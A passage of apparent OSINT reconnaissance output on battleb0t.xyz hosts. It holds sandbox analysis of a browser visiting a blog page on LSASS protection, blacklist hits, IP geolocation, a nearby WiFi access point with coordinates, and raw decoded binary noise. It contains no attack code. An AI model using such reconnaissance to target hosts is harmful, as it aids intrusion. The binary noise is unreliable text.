75830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\normaliz.dll" at 76130000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l1-1-0.dll" at 75840000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shlwapi.dll" at 764E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 000E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 75BE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msctf.dll" at 75AC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptbase.dll" at 755F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shell32-l1-1-0.dll" at 72980000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shell32.dll" at 76BA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\fltLib.dll" at 6CBB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-core-synch-l1-2-0.dll" at 721C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\secur32.dll" at 75430000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winhttp.dll" at 70E00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\webio.dll" at 70DA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mswsock.dll" at 750C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wship6.dll" at 750B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\IPHLPAPI.DLL" at 74C50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winnsi.dll" at 74C40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\clbcatq.dll" at 768D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netprofm.dll" at 6F2B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nlaapi.dll" at 738B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptsp.dll" at 75100000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 00F90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 74E90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\RpcRtRemote.dll" at 75690000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\npmproxy.dll" at 6E4D0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\ieproxy.dll" at 69B60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WSHTCPIP.DLL" at 74B70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dnsapi.dll" at 74F80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rasadhlp.dll" at 71F10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\FWPUCLNT.DLL" at 73620000\n "iexplore.exe" loaded module "%WINDIR%\\Fonts\\StaticCache.dat" at 03630000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\setupapi.dll" at 76140000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cfgmgr32.dll" at 75720000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\devobj.dll" at 758A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wshqos.dll" at 70F30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\credssp.dll" at 74DC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\schannel.dll" at 74F00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ncrypt.dll" at 75230000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcrypt.dll" at 75210000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcryptprimitives.dll" at 74DD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wintrust.dll" at 759F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gpapi.dll" at 74CD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\kernel32.dll" at 75C80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\KernelBase.dll" at 75850000\n "iexplore.exe" loaded module "%WINDIR%\\Globalization\\Sorting\\SortDefault.nls" at 00B90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieframe.dll" at 6D200000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ole32.dll" at 76770000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaut32.dll" at 766D0000\n "iexplore.exe" loaded module "%WINDIR%\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll" at 74650000\n "iexplore.exe" loaded module "%WINDIR%\\WindowsShell.Manifest" at 00E70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ws2_32.dll" at 75A30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nsi.dll" at 76540000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sspicli.dll" at 75580000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\IEShims.dll" at 69B10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\comdlg32.dll" at 75C00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcss.dll" at 00590000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\uxtheme.dll" at 743E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\urlmon.dll" at 76390000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-ole32-l1-1-0.dll" at 75810000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wininet.dll" at 75DC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\userenv.dll" at 757E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\profapi.dll" at 75700000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dwmapi.dll" at 73E30000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\sqmapi.dll" at 721D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l2-1-0.dll" at 71450000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat" at 005A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l2-1-0.dll" at 69740000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netapi32.dll" at 73C60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netutils.dll" at 73C50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\srvcli.dll" at 75310000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wkscli.dll" at 73C40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\apphelp.dll" at 755A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\crypt32.dll" at 758C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msasn1.dll" at 75710000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieui.dll" at 69A90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\user32.dll.mui" at 01050000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WindowsCodecs.dll" at 73CF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleacc.dll" at 6D110000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaccrc.dll" at 021F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ExplorerFrame.dll" at 71470000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\duser.dll" at 73F40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dui70.dll" at 73FB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msimg32.dll" at 72210000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\msctf.dll.mui" at 02940000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc6.dll" at 735C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc.dll" at 74B80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mlang.dll" at 6CB80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\propsys.dll" at 74420000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ntmarta.dll" at 74C10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Wldap32.dll" at 75A70000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" at 029B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 666E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 65290000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 029A0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000016.db" at 02AF0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 029E0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver | 185.199.109.153 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.5): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:67:D8) | 50.1188, 8.6843 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.159): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:29:45 | Blacklisted IP Address | Yes | UCEPROTECT | 0 | 1 | 3 | 0 | None | UCEPROTECT - Level 2 (some false positives) (46.101.229.70) | 46.101.229.70 |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | nwapi.battleb0t.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | nuke.battleb0t.xyz |
| 2023-05-12 03:10:23 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [207.154.224.0/20]
http://www.voipbl.org/update | 207.154.224.0/20 |
| 2023-05-12 02:55:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://itm4n.github.io/lsass-runasppl', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "142.251.46.234:443"\n "151.101.1.229:443"\n "142.250.189.163:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e10_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e10_IE_EarlyTabStart_0x784_Mutex"\n "IsoScope_e10_IESQMMUTEX_0_331"\n "IsoScope_e10_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e10_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3600"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e10_ConnHashTable<3600>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "magnific-popup.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF15F73B092E2A1400.TMP" has type "data"- Location: [%TEMP%\\~DF15F73B092E2A1400.TMP]- [targetUID: 00000000-00003600]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "L4C1VR4B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L4C1VR4B.txt]- [targetUID: 00000000-00003600]\n "~DFE6DB0B57F3EA4B8A.TMP" has type "data"- Location: [%TEMP%\\~DFE6DB0B57F3EA4B8A.TMP]- [targetUID: 00000000-00003600]\n "clipboard.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_01DE0D99-B1E0-11ED-B635-080027FA00EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "lsass-runasppl_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "localizedFormat.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "GS7U5M1T.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GS7U5M1T.txt]- [targetUID: 00000000-00003600]\n "S6uyw4BMUTPHvxo_1_.woff" has type "Web Open Font Format TrueType length 34020 version 1.1"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "simple-jekyll-search.min_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "bootstrap-toc.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "lsass-runasppl_2_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_0C8AED11-B1E0-11ED-B635-080027FA00EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bootstrap-toc.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://itm4n.github.io/lsass-runasppl"\n Pattern match: "https://itm4n.github.io"\n Pattern match: "https://itm4n.github.io/lsass-runasppl/"\n Heuristic match: "Lsc\'.si"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /lsass-runasppl HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: itm4n.github.io\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 301 Moved Permanently\nConnection: keep-alive\nContent-Length: 162\nServer: GitHub.com\nContent-Type: text/html\npermissions-policy: interest-cohort=()\nx-origin-cache: HIT\nLocation: https://itm4n.github.io/lsass-runasppl/\nAccess-Control-Allow-Origin: *\nStrict-Transport-Security: max-age=31556952\nexpires: Tue, 21 Feb 2023 13:15:27 GMT\nCache-Control: max-age=600\nx-proxy-cache: MISS\nX-GitHub-Request-Id: 285E:9A97:2F5E56:376309:63F4C196\nAccept-Ranges: bytes\nDate: Tue, 21 Feb 2023 13:05:27 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10044-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1676984727.973288,VS0,VE86\nVary: Accept-Encoding\nX-Fastly-Request-ID: 8917d38f4255e27c3ee7d2913db826c19a210b67"\n "<html>\n<head><title>301 Moved Permanently</title></head>\n<body>\n<center><h1>301 Moved Permanently</h1></center>\n<hr><center>nginx</center>\n</body>\n</html>"\n "GET /lsass-runasppl/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: itm4n.github.io\nConnection: Keep-Alive\nDNT: 1"\n "}rF;fRR,KrlHtrR5U $a4 *v.@%gX^z{_?t~"YEFZH;x/?~(2eNo_Ld1kYKwo]rif5^6?!|7p\n~wCqGWN;C?j#jzjnq"lG{cST|qL]4 H]:??[vNA[]#J;=`w?e$R,nih$G\nAX30G^<QBFn?@\n;}@(pgq-)J)Ro&\'Y[yRF"o2v3\nL[q\nI\nq*&naG\nf@&.!_R)@B6(sx>StA<qDi@0TUQ[s=gMX\nlq*-_jp\'jl~$Y<\n__GG UUiQ~@Uj\n_oksl8O{{lnuM\nM=MMc$X8baYNF<^87YkX5mzIk)S6/=x9+A]ZRb{-4eHF+:5: eEwI--K4xa:xAv\\\ndIO2V>;uj}y7BLup5wmuu\\z/gzJJDl\nz7$mj2N]K<\\PI56\n#Ano\nnkqLMT%tU}HeK%gt4\n\'PK/tq%JP2FpN!8I|!~R2o}*L SGKB@/wB/\':mG2[|[lHrvJm};tC?2oon~*Ik1 w$8SY&/w:gP>#Zw/wn{Fx]\\G;We2J*/V", ":$N0]U:O?`/kT~p\'0 he/_L}|y*<D+[3z/Lt/mjW/N{4S/QSdi>b\nMU3_4):GKzDOqBJVb}LD`(oD`N$,Yj2\n^ATkug@"Zkkm#5 A?\n=U@XwS(C@MuQHU4D1! JwZkl8=avM*[D4D*(^_(mX|-%6|r\nfgY<MG4AHpm2K`\\U\ne;gM1|ok1>xfY:3iy#.jS7Fs\n3[J FK\\y`\n"w@PHN~<L`@"$f@co}W){{lO7D,d*>o[ZLpe;d`;Z<bzIB{i-d~ZiNg`@vZB(,DT)oAdn\nR@08s+)}O[M?8@GFQ7*GFnOxH83cLQ<-Fp1bxyKpL=bQ\n/2M]aTVdHqoc=y]C:TPT}j-!?YSPU|m @aDRuo~\'Nwsr$rXh\'b2~c1a?(]O"v|47:x*tV n&G,K<`H7\\w/NO.+sGKA/NuCn@GoNX;t^"9?bPzW5!i,2b}a$SP::JE#^s,*I\\HE 4Ru#TXmlGL9:vU-a~J7qM\n>*bBVCE&8:C)=WVFLj0TQZi\n((lMO2CX}M|KH;I=g-C8l7HogoP2V}v)Jn?}[", "k;YFDF*JpP#[K*j^njV4mf:4G|!-;-{<t*@;&x8l"9`e\n]nmF/FlhlojNH\nU%p:%G0r]\nzz#8f_w5Olio]ccu\'Q;3C;dKyj0\nB/dh7v};OvpzqLJ 2?OB=ac&x!pwhAEpYK-QJ_M%$5[Z~)#D31]FqZL~bM>cQ$_~c=>D}c(*S\';Cq/:Vt\\^/hp"ArZ?z)rj}`*\nqZ3e1Zi1*(4|\nP)B\nTh\n$8\\a-N1^THp+i.|pR#gm`"nuKlJJ-j3\nBGJ3&DQ~NO!QQp|(\'4G 9<pS4M0J2O]Khz=@La2z2AHB~hsN@DI;9Z$,@q7iqD=Qh/NjAC*\'<Eq&HX\n1L_2)GJpU%\n8Z5$1KaxV+y@C7aF\\u8:fx6u:XwSoAx"\'fEjc:<8)Tk9;N!Q<tYKA_I0@*!4?W!\'!ZS"KZ@998s(TG#R|k5"qed c*tj5 Se[d~jUkpES`\nqO`DcUID|<\ncT[lz*{$X\n(UxofrN]W"G"X~4/kM O|xn A^,Y.`lcNf1}|gc\n?mJD`QSP3x0 ?$tCiTjj+&{W`3);iQp9LC)BSjbR mN\\rx", "QG`\\-*(9i@$&h~j)V DOLE\' JCR(\'VU@mpu`CYR@dXkPl+[@[+40!HHm4`jE\nN||^l1@BI`k?U0}sn2|H6yh>W\nK_pC>\n\nA<4l~Z]ZP5*4$q\\ZY2%!Fk Eq`Jx=I~GeVjkC6\nK0K-pXp>rl=Z8}.GuP)k+3f(FQ$&6g@p\nc.qRfLJ0*;+Rx{%]==\n*\'|4S;xE,mHo+CLqc%Je+@BeymB-6dTjnI%uE8thbk2SjA&=2w%nen&0Us4<1hT6V$&ZE11Lqd0Qbzpc}K.z}8Lf \nS<\nh&Z~!ZGR"FeE?T\nN#!L/B.8Gq=`TV4mUxl@6iBT}V3(E\\nQQcr>?2\n C9b|}$k6"zN1:>Uz\n\nBI,%) ~$(XcjBtpq6Wr`3~++g"aNGM8QUd~5G<Z<l\n?"lqrR%\n4DhX#=o< Wgn$ue_\\x2ZKL8zEWlnA(;0,G}qC.y"[3ZTKx<G\n>]D+^Kv1p(6J^0XfQs\nH=u1bD\\egp+", "wB?"_kQq;fEB[*11 BJ+(sp6X%S00[L1(DP%26x2&\n@M8B8QK\ng"N3D$mFgONy8a~\'n%D7)McoCVKy\n\n8?Z;z\n#paI{{QHtq@\nVtb>J^)^S+eg6o6?qpO\\v\n@~eiPP0lbG`N`Od!?arYxfqG\\\nPk)$AL~g(wg;Orsw n\nu7\n6[+pujp%>fuu*l7D@YI\n"+U ~$M(1yE,IAtp[GI`G*3Nv N&\nfaU:wgS9D1/2kCOU?m0%iI`cGv>zg?n>vuwp_U[L7sc@UKcUu1w|CPn3=lPRK,G\'xyh\'?}<}wwqfWt>dvz9]5=WE\nn47>wW!DF&e`!&_],hTr:2[If/rBq,a>!h}~5XAu`DZpFb>73O\\|Pq0f:\nwN1&e~W*e}I"WWxQc4)p+}Tw=;mrLqRX3A\np]WZanUR~m:#Sic-al+Mk{3k\n2kg!(Fq]4"?L=/ JrMgsg\\0f-5z^%dPUfY66#q:S60p~zlMd\\Bu]GhB6,.gw$h%Mws?c-Ho_[/L]1-dN3HJ^T9/& a(", "3nvE{A2gr4l&m 1!JvI/?0\ni(lUBRh<ei3%f!\'D?@cSt/+1$#Cc&eL+t"_4q?V1\\O\\>h2e+)pNDSA`OtSn:*"x|0cd+@b`6.AELXrj*A$J(^Ld"ob6TugT+hEmRqFIJe:l "U%e]QPM| :t(`NP^#d%]M5j{h;Cs\nx_*.~K!\'V3)+g\\}4q2tv im\n2"">a6,QjlWHQ jEL\n($x(&j\'CYvL#<XI,k06xCVf3X0\\z7}\nyA\'/#+9\'omM50@GL|lQ0jo*?H\\#6_rG)4)J<z>T,:Dc_dglZ9U9/j+!6K)Iv%1\n4BlKR\\*+`s 4QV*YC$B)!|!ys2jaWP=;u)a(R7g`)bB1\nia-2Is_A& u0$0(iLa[}~\njW9pZz\\)HxR${!~_AZ&Wjkb^DNuX\n\n8x6!$5CZ/"E | 185.199.109.153 |
| 2023-05-12 03:16:24 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.97.1', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} | 188.114.97.1 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5e7988238a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="y6.jA_9kQFy3M6YOg.QQj0I7RDwRq_S0_mJGsO_2b80-1683861862-0-AcgqVWkb5rc1wRzq8CruZzqixRf2dFZvnnpeMqPo3y2RR7Jx_-WXovg8bbE5-sP--_UlGfcV7z4_V2dzBcMQgc0YMGe-kEUsKgbTagVXmpUA4ghc-4PKKMUpkHtuZz1pOKMcK0utLj3hccZMUZnWLxuhkTuTIuQG4o4TSyLTO5DkVUoXElS5eAJBZDveAXcM-BMmbtyiS5OZrdIj-mSAmfLaL706pmvV2Fnl5vtOScBdKynAsN6R2sxLPULzhy1STjWMiZSraZ6Ew2wxtjJHN1h4TKQbcQWPXgeC7N8JO4M701hR33k8KGtSEURoh0GVidfXau0xJ5Jr_OGYkw5FwTBNxUlh_dNr8sS8DOR88UaR5CKeXC5a8lA8uHqsSe_vEPdtQ6ldEQsz8iyhLDK-toyNqpISWEaAU-LNzhQYcTSFycIkBAwjz1zpN5j-awjwVXg6RSi8xKpcwkSr--vTKuOd6x5Ta6zVKvVa1ZDb1BUG5hCEGVVAylLih2TiGym6K9ZGtKfmo5uFC383bpOhjywcXyRzMeHVb0-6rTS3z63iX3ajtvlcxXXHBtT7ZYhauWYn6f0gWo9iG78z0gFNWMboZLU8duYgFtCeIooI5W88WdaOwHui00SnK7AZf-I1NO1RlI5CzrcfcBEcVnBP-f_yBVIgGca2GM5pwr7RuguWROnl62QKlF8-RLW3LA5gZmJXKAJZeG1tfcH7m64xxmCx5ACGWrjrUMscOUmz4eHVBUSovlHfs3fcaIk9rIcxhwwBJRVDZ7oKn49L5lwNMgQFGDH_uzu8lK7M31bKNSdUqZK_4nMd7x2dSJvuX6x1f0d5_OcVPHJZxZ3t19Y2v21qYtJUwk_l3orppRJLdYFyIFSiVGRp27InLA-bNsaoFJuYkaXhMvKIRYQcI57Gu9t5UJBJyHfItWPN13CPHmTRR-xesXCsUCGNSlrn27LW82G3vB0LsnqsDVH9D7CmoXk767loN6MRiMM6E9lV7pktIJEgRREZerErCz-Gw9056q07NCPJYQafcy44fhA0Ayu8GVn0zQYz2hW6ho8NtCxWLxQfDeVyMn6PMsg4IcHVBtGEwWH4OhHGTM9Y96fCik0WwBZwbXdS00HiRtlSReGbhDYPFuGYXFHlUkiHUQ8TNNjJwXP8HrnSnr-Tv6HMk8DT21iZM1t8Ws-Z1VPVHIUqMpqoj6bYoJTKdTHCyWVXSoymcDjiiAr_dGcQ70iCvCfjEHAw9_ZFb11mKAVckSFfHs_OhqOxwVZ8fWFWX5CRVYjb8-2Mg4cL3IvIHLOVh97Eo-8uZhAyESkAuV2iGT1_77CGqcRlglDGfKHj9D0j_GrA2lys8V_W4n84xH9sB9BtW8YrWDnEH4r1lV4ZaxbUDArRwxqP9P1FzSMMjtcVzsgzIRpF2ste2ogtL1ku1f750t7TYDkzGvNZnmSp--sTxTZcyZjvZuT-kxIOnFkQudjV92D0dpRia33x6FdgV44_rvGqDtNVBEvpDVRPc5F7iWJTGkpG_0wSt-t0pHAlpnVj5960VNsQ1fIVqzIjyeTRIupoKny56OID3zofBUX9GXMMvftzuBxkvH568kA-nhoghfb5gJUTU4dQVs3